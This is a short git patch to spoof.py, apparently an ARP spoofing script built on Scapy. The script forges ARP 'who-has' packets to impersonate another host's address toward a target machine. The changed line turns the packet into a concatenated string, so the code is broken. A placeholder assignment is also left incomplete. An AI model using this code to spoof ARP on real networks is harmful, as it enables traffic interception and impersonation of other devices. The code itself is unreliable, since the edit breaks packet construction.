From 2c6f57b030528292c3ebd08e38c3a2d2bf710732 Mon Sep 17 00:00:00 2001 From: xdavidhu Date: Mon, 26 Dec 2016 21:53:21 +0100 Subject: [PATCH] Update spoof.py --- spoof.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/spoof.py b/spoof.py index 375888d..2173f45 100644 --- a/spoof.py +++ b/spoof.py @@ -27,5 +27,5 @@ impersonation = # IMPERSONATION MAC # CRAFT & SEND PACKET -packet = Ether()/ARP(op="who-has", hwsrc=my_mac, psrc=impersonation, pdst=target) +packet = 'Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op="who-has", hwsrc='+my_mac+', psrc='+impersonation+', pdst='+target+')' sendp(packet)